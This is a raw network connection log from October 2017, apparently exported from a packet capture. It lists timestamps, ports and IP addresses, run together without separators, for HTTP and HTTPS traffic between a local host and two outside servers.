Okt 17, 2017 21:53:59.314491987 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.402848005 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.402882099 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.403053999 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.403074980 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.425837040 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.425976038 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.426012039 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.441534996 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.441565990 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.441797018 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.441837072 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.448627949 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.448658943 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.448868036 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.448913097 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.533437967 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.533469915 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.533684015 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.533725023 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.556759119 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.556799889 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.557017088 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.557056904 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.571675062 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.571710110 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.571718931 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.572340965 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.579009056 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.579032898 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.579051971 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.579163074 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.665395975 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.665426016 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.665435076 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.665693998 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.672462940 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.686429977 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.686463118 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.686779022 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.686820984 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.701689005 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.701999903 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.702039957 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.708837986 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.708863020 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.709043980 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.709084034 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.794886112 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.794909954 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.795082092 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.795123100 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.795227051 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.795248985 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.796582937 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.796622038 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.823174000 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.823203087 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.823218107 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.823920965 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.831305981 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.833296061 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.833326101 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.833419085 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.833439112 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.838633060 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.838656902 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.838834047 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.838869095 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.925852060 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.925887108 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.926202059 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.926242113 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.950547934 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.950596094 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.950604916 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.950829029 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.950853109 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.962357998 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.962383986 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.962544918 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.962568998 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.963138103 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.963280916 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.963305950 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:54:00.184457064 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:54:00.184565067 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:54:00.228452921 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:54:14.101870060 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.101908922 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.104523897 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.105124950 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.105144024 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.579498053 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.579520941 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.579530001 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.579709053 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.598301888 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.598324060 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.598331928 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.598510981 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.605300903 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.605416059 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.612484932 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.612806082 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.688637018 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.688877106 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.696588039 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.696602106 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.696614981 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.696722984 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.705013037 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.705028057 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.705033064 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.705163002 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.727711916 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.727735043 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.727744102 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.727886915 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.734709024 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.734918118 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.737425089 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.737447977 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.737622976 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.741868019 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.741889954 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.742098093 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.818058014 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.818192959 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.836479902 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.836519957 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.836528063 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.836992025 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.843561888 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.843585014 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.843592882 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.843926907 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.868352890 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.868376017 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.868385077 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.868489027 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.869237900 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.869261980 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.869271040 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.869373083 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.875215054 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.875349998 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.948787928 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.948810101 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.948818922 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.948925972 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.958575010 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.958707094 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.965639114 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.965904951 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.969369888 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.969393015 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.969402075 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.969516993 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:14.973743916 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.973767042 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.973774910 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:14.973907948 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:15.000880957 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:15.001020908 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:15.008059978 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:15.008083105 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:15.008090973 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:15.008476973 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:15.056451082 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:15.056473017 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:15.056480885 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:15.056667089 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:15.063719034 MESZ443491925.196.73.150192.168.1.16
Okt 17, 2017 21:54:15.063795090 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:17.357604980 MESZ49192443192.168.1.165.196.73.150
Okt 17, 2017 21:54:24.007396936 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:24.007430077 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:24.010001898 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:24.010586977 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:24.010605097 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.853602886 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.853627920 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.853637934 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.853841066 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:25.904571056 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.904593945 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.904603004 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.904890060 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:25.911720037 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.912003994 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:25.983668089 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.983948946 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:25.985970974 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.985992908 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.986001015 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.986263990 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:25.990773916 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.990796089 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.990804911 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:25.991065979 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.025063038 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.025087118 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.025094986 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.025301933 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.032200098 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.032959938 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.039309025 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.039331913 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.039339066 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.039549112 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.039565086 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.040175915 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.046448946 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.046869040 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.107166052 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.107188940 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.107197046 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.107414007 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.116276979 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.116300106 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.116323948 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.116916895 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.124963045 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.125171900 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.147547960 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.147569895 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.147578001 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.147866011 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.154612064 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.154823065 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.161845922 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.161868095 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.161875963 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.162138939 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.168983936 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.169378996 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.172689915 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.172713041 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.172722101 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.172905922 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.176184893 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.176445961 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.303641081 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.303663969 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.303673029 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.303934097 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.315761089 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.315783024 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.315792084 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.316040993 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.331779003 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.331801891 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.331809998 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.332068920 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.333456039 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.333479881 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.333487988 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.333744049 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.333952904 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.333975077 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.333982944 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.334475994 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.347789049 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.347843885 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.347956896 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.385296106 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.385318995 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.385327101 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.385462999 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.398277044 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.398298979 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.398308039 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.398557901 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.412302971 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.412329912 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.412338018 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.413088083 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.439552069 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.439577103 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.439584970 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.440013885 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.440031052 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.440444946 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.445910931 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.445935011 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.445945978 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.446209908 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.456532955 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.456554890 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.456567049 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.456943989 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.516590118 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.516608953 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.516617060 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.516817093 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.517513990 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.517714024 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.518191099 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.518210888 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.518218040 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.518640041 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.523690939 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.523827076 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.543107033 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.543128967 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.543318987 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.571078062 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.571096897 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.571105957 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.571291924 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.572140932 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.572546005 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.576421976 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.576459885 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.576920033 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.591617107 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.591639042 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.591646910 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.591825008 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.648333073 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.648355961 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.648364067 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.648869038 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.652810097 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.653255939 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.654596090 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.654768944 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.655500889 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.655523062 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.655530930 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.655854940 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.686836004 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.686857939 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.686866045 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.687077999 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.695341110 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.695599079 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.706645012 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.706667900 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.706676960 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.707070112 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.712568998 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.712590933 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.712599993 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.712805986 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.719686031 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.719708920 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.719717979 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.719944000 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.777677059 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.777699947 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.777708054 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.777941942 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.779694080 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.779951096 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.780566931 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.780589104 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.780596972 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.780806065 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.781259060 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.781281948 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.781290054 MESZ443491935.196.73.150192.168.1.16
